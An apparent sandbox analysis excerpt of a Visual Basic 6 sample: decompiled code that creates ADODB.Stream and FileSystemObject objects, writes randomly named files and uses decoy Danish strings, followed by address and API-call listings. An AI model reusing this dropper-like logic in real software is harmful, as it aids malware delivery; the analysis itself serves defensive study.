									_t268 = _a4 + 0xd4; // 0x0
									__eflags =  *_t268 - _v272;
									if( *_t268 > _v272) {
										break;
									}
									_t271 = _a4 + 0xd4; // 0x0
									_t960 =  *_t271 + 0xe;
									__eflags = _t960;
									if(__eflags < 0) {
										goto L112;
									} else {
										asm("cdq");
										L004014BC();
										_t277 = _a4 + 0xc8; // 0x420b6f
										_t279 = _a4 + 0xd4; // 0x0
										 *((char*)( *_t277 +  *_t279)) = _t960 / 0xff;
										_t263 = _a4 + 0xd4; // 0x0
										_t1017 =  *_t263 + _v268;
										__eflags = _t1017;
										if(__eflags < 0) {
											goto L112;
										} else {
											 *(_a4 + 0xd4) = _t1017;
											continue;
										}
									}
									goto L137;
								}
							}
						} else {
							_push(0);
							_push(L"Scripting.FileSystemObject");
							_push( &_v108);
							L004015E8();
							_t1024 =  &_v108;
							_push(_t1024);
							L004015EE();
							_push(_t1024);
							_push(_a4 + 0xa0);
							L004015F4();
							L00401606();
							_v164 = 0x403188;
							_v172 = 8;
							L0040160C();
							_push( &_v108);
							_push( &_v124);
							L00401510();
							_v180 = L"\\Y8BvlQimiLpwrF4Mk23";
							_v188 = 8;
							_v212 = _v212 | 0xffffffff;
							_v220 = 0xb;
							_push( &_v124);
							_push( &_v188);
							_push( &_v140);
							L004014EC();
							_push(0x10);
							L00401390();
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_push(0x10);
							L00401390();
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_push(2);
							_push(L"CreateTextFile");
							_t198 = _a4 + 0xa0; // 0x40006
							_push( *_t198);
							_t1035 =  &_v156;
							_push(_t1035);
							L004014F2();
							_push(_t1035);
							L004015EE();
							_push(_t1035);
							_push(_a4 + 0xa4);
							L004015F4();
							_push( &_v156);
							_push( &_v140);
							_push( &_v124);
							_push( &_v108);
							_push(4);
							L00401654();
							_v164 = L"tandpleje";
							_v172 = 8;
							L0040160C();
							_push( &_v108);
							_push( &_v124);
							L004014E6();
							_v132 = 0xf9;
							_v140 = 2;
							_push( &_v140);
							_push(0x6f);
							_push( &_v124);
							_t1046 =  &_v84;
							_push(_t1046);
							L00401666();
							_push(_t1046);
							L004014E0();
							L00401672();
							L00401642();
							_push( &_v88);
							_push( &_v84);
							_push(2);
							L0040159A();
							_push( &_v140);
							_push( &_v124);
							_push( &_v108);
							_push(3);
							L00401654();
							_v164 = L"CYKELENS";
							_v172 = 8;
							L0040160C();
							_push(0x58);
							_push( &_v108);
							_push( &_v124);
							L004014DA();
							_push( &_v124);
							L004015AC();
							L00401672();
							L00401642();
							_t1214 =  &_v84;
							L0040165A();
							_push( &_v124);
							_push( &_v108);
							_push(2);
							L00401654();
							_t1332 =  *0x401298;
							_push(_t1214);
							_push(_t1214);
							 *((long long*)(_t1307 + 0x6c)) = _t1332;
							L004014CE();
							_push(_t1214);
							_push(_t1214);
							_v284 = _t1332;
							L004014D4();
							L00401672();
						}
					} else {
						_v100 = 4;
						_v108 = 2;
						_push( &_v108);
						L0040153A();
						L00401672();
						_v288 = _v88;
						_v88 = _v88 & 0x00000000;
						_v116 = _v288;
						_v124 = 8;
						_push(0x26);
						_push( &_v124);
						_push( &_v140);
						L004014F8();
						_push( &_v140);
						L004015AC();
						L00401672();
						L00401642();
						_push( &_v88);
						_push( &_v84);
						_push(2);
						L0040159A();
						_push( &_v140);
						_push( &_v124);
						_push( &_v108);
						_push(3);
						L00401654();
						_push(0);
						_push(L"ADODB.Stream");
						_push( &_v108);
						L004015E8();
						_t1069 =  &_v108;
						_push(_t1069);
						L004015EE();
						_push(_t1069);
						_push(_a4 + 0x94);
						L004015F4();
						L00401606();
						_push(0);
						_push(L"Scripting.FileSystemObject");
						_push( &_v108);
						L004015E8();
						_t1073 =  &_v108;
						_push(_t1073);
						L004015EE();
						_push(_t1073);
						_push(_a4 + 0x98);
						L004015F4();
						L00401606();
						_v164 = 0x403188;
						_v172 = 8;
						L0040160C();
						_push( &_v108);
						_push( &_v124);
						L00401510();
						_v180 = L"\\Bk119";
						_v188 = 8;
						_v212 = _v212 | 0xffffffff;
						_v220 = 0xb;
						_push( &_v124);
						_push( &_v188);
						_push( &_v140);
						L004014EC();
						_push(0x10);
						L00401390();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_push(0x10);
						L00401390();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_push(2);
						_push(L"CreateTextFile");
						_t170 = _a4 + 0x98; // 0x4202b8
						_push( *_t170);
						_t1084 =  &_v156;
						_push(_t1084);
						L004014F2();
						_push(_t1084);
						L004015EE();
						_push(_t1084);
						_push(_a4 + 0x9c);
						L004015F4();
						_push( &_v156);
						_push( &_v140);
						_push( &_v124);
						_push( &_v108);
						_push(4);
						L00401654();
					}
					goto L107;
				}
				L137:
			}

0x0041e02c
0x0041e02c
0x0041e02c
0x0041e02d
0x0041e02f
0x0041e03e
0x0041e04a
0x0041e052
0x0041e055
0x0041e05c
0x0041e06b
0x0041e07d
0x0041e083
0x0041e085
0x0041e092
0x0041e0b4
0x0041e0b4
0x0041e0b4
0x0041e094
0x0041e094
0x0041e099
0x0041e09e
0x0041e0a1
0x0041e0a7
0x0041e0ac
0x0041e0ac
0x0041e0bb
0x0041e0c5
0x0041e0cb
0x0041e0d5
0x0041e0e8
0x0041e0ed
0x0041e0f2
0x0041e0fc
0x0041e101
0x0041e102
0x0041e105
0x0041e106
0x0041e110
0x0041e115
0x0041e116
0x0041e11d
0x0041e123
0x0041e12d
0x0041e131
0x0041e132
0x0041e134
0x0041e139
0x0041e13f
0x0041e14d
0x0041f497
0x0041f4a6
0x0041f4ac
0x0041f4ae
0x0041f4bb
0x0041f4dd
0x0041f4dd
0x0041f4dd
0x0041f4bd
0x0041f4bd
0x0041f4c2
0x0041f4c7
0x0041f4ca
0x0041f4d0
0x0041f4d5
0x0041f4d5
0x0041f4e4
0x0041f4eb
0x0041f4ee
0x0041f4f4
0x0041f4f5
0x0041f53d
0x0041f545
0x0041f54d
0x0041f555
0x0041f55d
0x0041f565
0x0041f56d
0x0041f575
0x0041f57a
0x0041e153
0x0041e15a
0x0041e177
0x0041e15c
0x0041e15c
0x0041e161
0x0041e166
0x0041e16b
0x0041e16b
0x0041e189
0x0041e1a1
0x0041e1a4
0x0041e1a6
0x0041e1b3
0x0041e1d5
0x0041e1d5
0x0041e1d5
0x0041e1b5
0x0041e1b5
0x0041e1b7
0x0041e1bc
0x0041e1c2
0x0041e1c8
0x0041e1cd
0x0041e1cd
0x0041e1df
0x0041e1f7
0x0041e1fd
0x0041e1ff
0x0041e20c
0x0041e231
0x0041e231
0x0041e231
0x0041e20e
0x0041e20e
0x0041e213
0x0041e218
0x0041e21e
0x0041e224
0x0041e229
0x0041e229
0x0041e23b
0x0041e241
0x0041e24e
0x0041e256
0x0041e25b
0x0041e265
0x0041e278
0x0041e280
0x0041e284
0x0041e285
0x0041e28a
0x0041e294
0x0041e2aa
0x0041e2b5
0x0041e2bc
0x0041e2bd
0x0041e2c2
0x0041e2c4
0x0041e2c6
0x0041e2c8
0x0041e2d3
0x0041e2d4
0x0041e2d7
0x0041e2d8
0x0041e2dd
0x0041e2e1
0x0041e2e2
0x0041e2e5
0x0041e2e6
0x0041e2eb
0x0041e2ec
0x0041e2f6
0x0041e2fe
0x0041e302
0x0041e303
0x0041e305
0x0041e313
0x0041e317
0x0041e31e
0x0041e322
0x0041e323
0x0041e325
0x0041e333
0x0041e338
0x0041e33b
0x0041e342
0x0041e344
0x0041e346
0x0041e348
0x0041e34d
0x0041e34e
0x0041e358
0x0041e368
0x0041e370
0x0041e378
0x0041e37d
0x0041e384
0x0041e38e
0x0041e392
0x0041e393
0x0041e39b
0x0041e39c
0x0041e3a6
0x0041e3b6
0x0041e3be
0x0041e3c6
0x0041e3ca
0x0041e3cb
0x0041e3cd
0x0041e3e4
0x0041e3e9
0x0041e3f3
0x0041e406
0x0041e40e
0x0041e40f
0x0041e417
0x0041e418
0x0041e41d
0x0041e423
0x0041e426
0x0041e427
0x0041e431
0x0041e436
0x0041e437
0x0041e43e
0x0041e443
0x0041e44d
0x0041e455
0x0041e459
0x0041e45a
0x0041e45c
0x0041e461
0x0041e464
0x0041e46d
0x0041e65c
0x0041e662
0x0041e667
0x0041e66c
0x0041e66e
0x0041e8bf
0x0041e8c5
0x0041e8ca
0x0041e8d4
0x0041e8d9
0x0041e8da
0x0041e8e1
0x0041e8e6
0x0041e8f0
0x0041e8fc
0x0041e8fe
0x0041ea3c
0x0041ea46
0x0041ea50
0x0041ea58
0x0041ea59
0x0041ea66
0x0041ea67
0x0041ea68
0x0041ea69
0x0041ea6a
0x0041ea6f
0x0041ea74
0x0041ea79
0x0041ea83
0x0041ea88
0x0041ea89
0x0041ea90
0x0041ea95
0x0041ea9f
0x0041eaab
0x0041eaad
0x0041ee02
0x0041ee03
0x0041ee08
0x0041ee0e
0x0041ee11
0x0041ee12
0x0041ee1c
0x0041ee21
0x0041ee22
0x0041ee29
0x0041ee2e
0x0041ee38
0x0041ee40
0x0041ee45
0x0041ee4c
0x0041ee4e
0x0041f178
0x0041f17e
0x0041f183
0x0041f188
0x0041f18a
0x0041f190
0x0041f197
0x0041f1b4
0x0041f199
0x0041f199
0x0041f19e
0x0041f1a3
0x0041f1a8
0x0041f1a8
0x0041f1c6
0x0041f1de
0x0041f1e1
0x0041f1e3
0x0041f1e9
0x0041f1f0
0x0041f212
0x0041f212
0x0041f212
0x0041f1f2
0x0041f1f2
0x0041f1f4
0x0041f1f9
0x0041f1ff
0x0041f205
0x0041f20a
0x0041f20a
0x0041f21c
0x0041f237
0x0041f23d
0x0041f23f
0x0041f245
0x0041f24c
0x0041f271
0x0041f271
0x0041f271
0x0041f24e
0x0041f24e
0x0041f253
0x0041f258
0x0041f25e
0x0041f264
0x0041f269
0x0041f269
0x0041f282
0x0041f28c
0x0041f291
0x0041f29b
0x0041f2ae
0x0041f2b6
0x0041f2ba
0x0041f2bb
0x0041f2c0
0x0041f2ca
0x0041f2d7
0x0041f2de
0x0041f2df
0x0041f2e5
0x0041f2e6
0x0041f2eb
0x0041f2ec
0x0041f2f6
0x0041f2fb
0x0041f2fc
0x0041f2fe
0x0041f300
0x0041f302
0x0041f30a
0x0041f315
0x0041f319
0x0041f31d
0x0041f31e
0x0041f320
0x0041f330
0x0041f335
0x0041f33a
0x0041f33b
0x0041f33d
0x0041f345
0x0041f34a
0x0041f34c
0x0041f351
0x0041f358
0x0041f375
0x0041f35a
0x0041f35a
0x0041f35f
0x0041f364
0x0041f369
0x0041f369
0x0041f387
0x0041f39f
0x0041f3a2
0x0041f3a4
0x0041f3aa
0x0041f3b1
0x0041f3d3
0x0041f3d3
0x0041f3d3
0x0041f3b3
0x0041f3b3
0x0041f3b5
0x0041f3ba
0x0041f3c0
0x0041f3c6
0x0041f3cb
0x0041f3cb
0x0041f3dd
0x0041f3f8
0x0041f3fe
0x0041f400
0x0041f406
0x0041f40d
0x0041f432
0x0041f432
0x0041f432
0x0041f40f
0x0041f40f
0x0041f414
0x0041f419
0x0041f41f
0x0041f425
0x0041f42a
0x0041f42a
0x0041f440
0x0041f447
0x0041f44c
0x0041f453
0x0041f45d
0x0041f45e
0x0041f463
0x0041f468
0x0041f472
0x0041f47c
0x0041f482
0x0041f48a
0x0041f492
0x0041f492
0x0041ee54
0x0041ee54
0x0041ee5b
0x0041ee78
0x0041ee5d
0x0041ee5d
0x0041ee62
0x0041ee67
0x0041ee6c
0x0041ee6c
0x0041ee8a
0x0041eea2
0x0041eea5
0x0041eea7
0x0041eead
0x0041eeb4
0x0041eed6
0x0041eed6
0x0041eed6
0x0041eeb6
0x0041eeb6
0x0041eeb8
0x0041eebd
0x0041eec3
0x0041eec9
0x0041eece
0x0041eece
0x0041eee0
0x0041eef8
0x0041eefe
0x0041ef00
0x0041ef06
0x0041ef0d
0x0041ef32
0x0041ef32
0x0041ef32
0x0041ef0f
0x0041ef0f
0x0041ef14
0x0041ef19
0x0041ef1f
0x0041ef25
0x0041ef2a
0x0041ef2a
0x0041ef3c
0x0041ef42
0x0041ef4f
0x0041ef57
0x0041ef5c
0x0041ef63
0x0041ef80
0x0041ef65
0x0041ef65
0x0041ef6a
0x0041ef6f
0x0041ef74
0x0041ef74
0x0041ef92
0x0041efaa
0x0041efad
0x0041efaf
0x0041efb5
0x0041efbc
0x0041efde
0x0041efde
0x0041efde
0x0041efbe
0x0041efbe
0x0041efc0
0x0041efc5
0x0041efcb
0x0041efd1
0x0041efd6
0x0041efd6
0x0041efe8
0x0041f003
0x0041f006
0x0041f008
0x0041f00e
0x0041f015
0x0041f037
0x0041f037
0x0041f037
0x0041f017
0x0041f017
0x0041f019
0x0041f01e
0x0041f024
0x0041f02a
0x0041f02f
0x0041f02f
0x0041f048
0x0041f052
0x0041f057
0x0041f05e
0x0041f07b
0x0041f060
0x0041f060
0x0041f065
0x0041f06a
0x0041f06f
0x0041f06f
0x0041f08d
0x0041f0a5
0x0041f0a8
0x0041f0aa
0x0041f0b0
0x0041f0b7
0x0041f0d9
0x0041f0d9
0x0041f0d9
0x0041f0b9
0x0041f0b9
0x0041f0bb
0x0041f0c0
0x0041f0c6
0x0041f0cc
0x0041f0d1
0x0041f0d1
0x0041f0e3
0x0041f0fe
0x0041f101
0x0041f103
0x0041f109
0x0041f110
0x0041f132
0x0041f132
0x0041f132
0x0041f112
0x0041f112
0x0041f114
0x0041f119
0x0041f11f
0x0041f125
0x0041f12a
0x0041f12a
0x0041f139
0x0041f140
0x0041f147
0x0041f14c
0x0041f156
0x0041f15b
0x0041f15c
0x0041f166
0x0041f16e
0x0041f16e
0x0041eab3
0x0041eab3
0x0041eab5
0x0041eabd
0x0041eabe
0x0041eac3
0x0041eac6
0x0041eac7
0x0041eacc
0x0041ead0
0x0041ead1
0x0041ead9
0x0041eade
0x0041eae5
0x0041eb02
0x0041eae7
0x0041eae7
0x0041eaec
0x0041eaf1
0x0041eaf6
0x0041eaf6
0x0041eb14
0x0041eb2c
0x0041eb2f
0x0041eb31
0x0041eb37
0x0041eb3e
0x0041eb60
0x0041eb60
0x0041eb60
0x0041eb40
0x0041eb40
0x0041eb42
0x0041eb47
0x0041eb4d
0x0041eb53
0x0041eb58
0x0041eb58
0x0041eb6a
0x0041eb85
0x0041eb88
0x0041eb8a
0x0041eb90
0x0041eb97
0x0041ebb9
0x0041ebb9
0x0041ebb9
0x0041eb99
0x0041eb99
0x0041eb9b
0x0041eba0
0x0041eba6
0x0041ebac
0x0041ebb1
0x0041ebb1
0x0041ebc7
0x0041ebce
0x0041ebd3
0x0041ebda
0x0041ebf7
0x0041ebdc
0x0041ebdc
0x0041ebe1
0x0041ebe6
0x0041ebeb
0x0041ebeb
0x0041ec09
0x0041ec21
0x0041ec24
0x0041ec26
0x0041ec2c
0x0041ec33
0x0041ec55
0x0041ec55
0x0041ec55
0x0041ec35
0x0041ec35
0x0041ec37
0x0041ec3c
0x0041ec42
0x0041ec48
0x0041ec4d
0x0041ec4d
0x0041ec5f
0x0041ec7a
0x0041ec80
0x0041ec82
0x0041ec88
0x0041ec8f
0x0041ecb4
0x0041ecb4
0x0041ecb4
0x0041ec91
0x0041ec91
0x0041ec96
0x0041ec9b
0x0041eca1
0x0041eca7
0x0041ecac
0x0041ecac
0x0041ecc1
0x0041ecc6
0x0041eccd
0x0041ecd2
0x0041ecdc
0x0041ece1
0x0041ece8
0x0041ed05
0x0041ecea
0x0041ecea
0x0041ecef
0x0041ecf4
0x0041ecf9
0x0041ecf9
0x0041ed17
0x0041ed2f
0x0041ed32
0x0041ed34
0x0041ed3a
0x0041ed41
0x0041ed63
0x0041ed63
0x0041ed63
0x0041ed43
0x0041ed43
0x0041ed45
0x0041ed4a
0x0041ed50
0x0041ed56
0x0041ed5b
0x0041ed5b
0x0041ed6d
0x0041ed73
0x0041ed76
0x0041ed7c
0x0041ed8b
0x0041ed9f
0x0041eda5
0x0041eda7
0x0041edad
0x0041edb4
0x0041edd9
0x0041edd9
0x0041edd9
0x0041edb6
0x0041edb6
0x0041edbb
0x0041edc0
0x0041edc6
0x0041edcc
0x0041edd1
0x0041edd1
0x0041ede3
0x0041ede7
0x0041ede8
0x0041edea
0x0041edf5
0x0041edf5
0x0041e904
0x0041e904
0x0041e904
0x0041e907
0x0041e911
0x00000000
0x00000000
0x0041e916
0x0041e91c
0x0041e91c
0x0041e91f
0x0041f5a4
0x0041f5a4
0x0041f5ac
0x0041f5bb
0x0041f5c7
0x0041f5cf
0x0041f5d2
0x0041f5d9
0x0041f5e8
0x0041f5f1
0x0041f5fc
0x0041f607
0x0041f60c
0x0041f612
0x0041f614
0x0041f615
0x0041f61b
0x0041f622
0x0041f63f
0x0041f624
0x0041f624
0x0041f629
0x0041f62e
0x0041f633
0x0041f633
0x0041f651
0x0041f669
0x0041f66c
0x0041f66e
0x0041f674
0x0041f67b
0x0041f69d
0x0041f69d
0x0041f69d
0x0041f67d
0x0041f67d
0x0041f67f
0x0041f684
0x0041f68a
0x0041f690
0x0041f695
0x0041f695
0x0041f6a7
0x0041f6c2
0x0041f6c8
0x0041f6ca
0x0041f6d0
0x0041f6d7
0x0041f6fc
0x0041f6fc
0x0041f6fc
0x0041f6d9
0x0041f6d9
0x0041f6de
0x0041f6e3
0x0041f6e9
0x0041f6ef
0x0041f6f4
0x0041f6f4
0x0041f70a
0x0041f711
0x0041f716
0x0041f720
0x0041f733
0x0041f73b
0x0041f73f
0x0041f740
0x0041f748
0x0041f749
0x0041f753
0x0041f75b
0x0041f75f
0x0041f760
0x0041f762
0x0041f76a
0x0041f774
0x0041f787
0x0041f78f
0x0041f790
0x0041f795
0x0041f79f
0x0041f7a4
0x0041f7a7
0x0041f7ad
0x0041f7b1
0x0041f7bf
0x0041f7c4
0x0041f7c5
0x0041f7cf
0x0041f7df
0x0041f7e7
0x0041f7eb
0x0041f7ef
0x0041f7f0
0x0041f7f2
0x0041f7f7
0x0041f7fd
0x0041f802
0x0041f807
0x0041f811
0x0041f81b
0x0041f821
0x0041f829
0x0041f829
0x0041f82e
0x0041f835
0x0041f83c
0x0041f843
0x0041f84a
0x0041f84c
0x0041f851
0x0041f855
0x0041f859
0x0041f85a
0x0041f85f
0x0041f869
0x0041f876
0x0041f877
0x0041f87d
0x0041f87e
0x0041f883
0x0041f88d
0x0041f891
0x0041f895
0x0041f896
0x0041f898
0x0041f8a0
0x0041f8a7
0x0041f8a9
0x0041f8af
0x0041f8b6
0x0041f8c0
0x0041f8c1
0x0041f8cb
0x0041f8d3
0x0041f8d8
0x0041f8df
0x0041f8fc
0x0041f8e1
0x0041f8e1
0x0041f8e6
0x0041f8eb
0x0041f8f0
0x0041f8f0
0x0041f90e
0x0041f926
0x0041f929
0x0041f92b
0x0041f931
0x0041f938
0x0041f95a
0x0041f95a
0x0041f95a
0x0041f93a
0x0041f93a
0x0041f93c
0x0041f941
0x0041f947
0x0041f94d
0x0041f952
0x0041f952
0x0041f964
0x0041f97c
0x0041f982
0x0041f984
0x0041f98a
0x0041f991
0x0041f9b6
0x0041f9b6
0x0041f9b6
0x0041f993
0x0041f993
0x0041f998
0x0041f99d
0x0041f9a3
0x0041f9a9
0x0041f9ae
0x0041f9ae
0x0041f9c0
0x0041f9c6
0x0041f9d3
0x0041f9db
0x0041f9e0
0x0041f9e5
0x0041f9ea
0x0041f9f4
0x0041fa04
0x0041fa0c
0x0041fa11
0x0041fa1b
0x0041fa2e
0x0041fa33
0x0041fa3b
0x0041fa3f
0x0041fa40
0x0041fa48
0x0041fa49
0x0041fa53
0x0041fa5d
0x0041fa63
0x0041fa6b
0x0041fa73
0x0041fa74
0x0041fa77
0x0041fa78
0x0041fa7a
0x0041fa7f
0x0041fa82
0x0041fa89
0x0041fa8a
0x0041facd
0x0041fad5
0x0041fadd
0x0041fae5
0x0041faed
0x0041faf2
0x0041e925
0x0041e928
0x0041e931
0x0041e931
0x0041e934
0x00000000
0x0041e93a
0x0041e93a
0x00000000
0x0041e93a
0x0041e934
0x00000000
0x0041e91f
0x0041e93f
0x0041e947
0x0041e948
0x0041e950
0x0041e951
0x0041e95b
0x0041e963
0x0041e968
0x0041e96a
0x0041e96c
0x0041e96e
0x0041e973
0x0041e978
0x0041e97d
0x0041e987
0x0041e997
0x0041e99f
0x0041e9a7
0x0041e9ac
0x0041e9ad
0x0041e9af
0x0041e9b4
0x0041e9ba
0x0041e9c7
0x0041e9ee
0x0041e9f1
0x0041e9f7
0x0041e9fd
0x00000000
0x00000000
0x0041ea02
0x0041ea08
0x0041ea08
0x0041ea0b
0x00000000
0x0041ea11
0x0041ea11
0x0041ea1b
0x0041ea23
0x0041ea2c
0x0041ea32
0x0041e9d3
0x0041e9d9
0x0041e9d9
0x0041e9df
0x00000000
0x0041e9e5
0x0041e9e8
0x00000000
0x0041e9e8
0x0041e9df
0x00000000
0x0041ea0b
0x0041ea37
0x0041e674
0x0041e674
0x0041e676
0x0041e67e
0x0041e67f
0x0041e684
0x0041e687
0x0041e688
0x0041e68d
0x0041e696
0x0041e697
0x0041e69f
0x0041e6a4
0x0041e6ae
0x0041e6c1
0x0041e6c9
0x0041e6cd
0x0041e6ce
0x0041e6d3
0x0041e6dd
0x0041e6e7
0x0041e6ee
0x0041e6fb
0x0041e702
0x0041e709
0x0041e70a
0x0041e711
0x0041e714
0x0041e71b
0x0041e71c
0x0041e71d
0x0041e71e
0x0041e71f
0x0041e722
0x0041e72f
0x0041e730
0x0041e731
0x0041e732
0x0041e733
0x0041e735
0x0041e73d
0x0041e73d
0x0041e743
0x0041e749
0x0041e74a
0x0041e752
0x0041e753
0x0041e758
0x0041e761
0x0041e762
0x0041e76d
0x0041e774
0x0041e778
0x0041e77c
0x0041e77d
0x0041e77f
0x0041e787
0x0041e791
0x0041e7a4
0x0041e7ac
0x0041e7b0
0x0041e7b1
0x0041e7b6
0x0041e7bd
0x0041e7cd
0x0041e7ce
0x0041e7d3
0x0041e7d4
0x0041e7d7
0x0041e7d8
0x0041e7dd
0x0041e7de
0x0041e7e8
0x0041e7f8
0x0041e800
0x0041e804
0x0041e805
0x0041e807
0x0041e815
0x0041e819
0x0041e81d
0x0041e81e
0x0041e820
0x0041e828
0x0041e832
0x0041e845
0x0041e84a
0x0041e84f
0x0041e853
0x0041e854
0x0041e85c
0x0041e85d
0x0041e867
0x0041e877
0x0041e87c
0x0041e87f
0x0041e887
0x0041e88b
0x0041e88c
0x0041e88e
0x0041e896
0x0041e89c
0x0041e89d
0x0041e89e
0x0041e8a1
0x0041e8a6
0x0041e8a7
0x0041e8a8
0x0041e8ab
0x0041e8b5
0x0041e8b5
0x0041e473
0x0041e473
0x0041e47a
0x0041e484
0x0041e485
0x0041e48f
0x0041e497
0x0041e49d
0x0041e4a7
0x0041e4aa
0x0041e4b1
0x0041e4b6
0x0041e4bd
0x0041e4be
0x0041e4c9
0x0041e4ca
0x0041e4d4
0x0041e4e4
0x0041e4ec
0x0041e4f0
0x0041e4f1
0x0041e4f3
0x0041e501
0x0041e505
0x0041e509
0x0041e50a
0x0041e50c
0x0041e514
0x0041e516
0x0041e51e
0x0041e51f
0x0041e524
0x0041e527
0x0041e528
0x0041e52d
0x0041e536
0x0041e537
0x0041e53f
0x0041e544
0x0041e546
0x0041e54e
0x0041e54f
0x0041e554
0x0041e557
0x0041e558
0x0041e55d
0x0041e566
0x0041e567
0x0041e56f
0x0041e574
0x0041e57e
0x0041e591
0x0041e599
0x0041e59d
0x0041e59e
0x0041e5a3
0x0041e5ad
0x0041e5b7
0x0041e5be
0x0041e5cb
0x0041e5d2
0x0041e5d9
0x0041e5da
0x0041e5e1
0x0041e5e4
0x0041e5eb
0x0041e5ec
0x0041e5ed
0x0041e5ee
0x0041e5ef
0x0041e5f2
0x0041e5ff
0x0041e600
0x0041e601
0x0041e602
0x0041e603
0x0041e605
0x0041e60d
0x0041e60d
0x0041e613
0x0041e619
0x0041e61a
0x0041e622
0x0041e623
0x0041e628
0x0041e631
0x0041e632
0x0041e63d
0x0041e644
0x0041e648
0x0041e64c
0x0041e64d
0x0041e64f
0x0041e654
0x00000000
0x0041e46d
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041E04A
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402958,00000290), ref: 0041E0A7
__vbaVarDup.MSVBVM60(00000000,004012A8,00402958,00000290), ref: 0041E0E8
__vbaStrI4.MSVBVM60(002E6A19), ref: 0041E0F2
__vbaStrMove.MSVBVM60(002E6A19), ref: 0041E0FC
#667.MSVBVM60(?,00000000,002E6A19), ref: 0041E106
__vbaStrMove.MSVBVM60(?,00000000,002E6A19), ref: 0041E110
__vbaStrCmp.MSVBVM60(00000000,?,00000000,002E6A19), ref: 0041E116
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,00000000,002E6A19), ref: 0041E134
__vbaFreeVar.MSVBVM60(?,?,00401396), ref: 0041E13F
__vbaNew2.MSVBVM60(00402D44,004223F0,?,?,00401396), ref: 0041E166
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041E1C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E224
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E24E
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E256
__vbaVarDup.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E278
#666.MSVBVM60(?,?), ref: 0041E285
__vbaVarDup.MSVBVM60(?,?), ref: 0041E2AA
#524.MSVBVM60(?,?,?,?), ref: 0041E2BD
__vbaStrVarVal.MSVBVM60(?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2D8
__vbaStrVarVal.MSVBVM60(00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2E6
#712.MSVBVM60(00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2EC
__vbaStrMove.MSVBVM60(00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2F6
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?), ref: 0041E305
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E325
__vbaFPFix.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E333
#704.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E34E
__vbaStrMove.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E358
__vbaStrCopy.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E368
__vbaFreeStr.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E370
__vbaFreeVar.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E378
#613.MSVBVM60(?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E393
__vbaStrVarMove.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E39C
__vbaStrMove.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3A6
__vbaStrCopy.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3B6
__vbaFreeStr.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3BE
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3CD
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E3E4
__vbaVarDup.MSVBVM60 ref: 0041E406
#607.MSVBVM60(?,00000097,?), ref: 0041E418
__vbaStrVarMove.MSVBVM60(?,?,?,00000097,?), ref: 0041E427
__vbaStrMove.MSVBVM60(?,?,?,00000097,?), ref: 0041E431
__vbaStrCmp.MSVBVM60(00000000,?,?,?,00000097,?), ref: 0041E437
__vbaFreeStr.MSVBVM60(00000000,?,?,?,00000097,?), ref: 0041E44D
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,?,00000097,?), ref: 0041E45C
#572.MSVBVM60(00000002), ref: 0041E485
__vbaStrMove.MSVBVM60(00000002), ref: 0041E48F
#619.MSVBVM60(?,00000008,00000026,?,?,?,00000002), ref: 0041E4BE
__vbaStrVarMove.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4CA
__vbaStrMove.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4D4
__vbaStrCopy.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4E4
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4F3
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041E50C
#716.MSVBVM60(?,ADODB.Stream,00000000), ref: 0041E51F
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000), ref: 0041E528
__vbaObjSetAddref.MSVBVM60(00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E537
__vbaFreeVar.MSVBVM60(00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E53F
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E54F
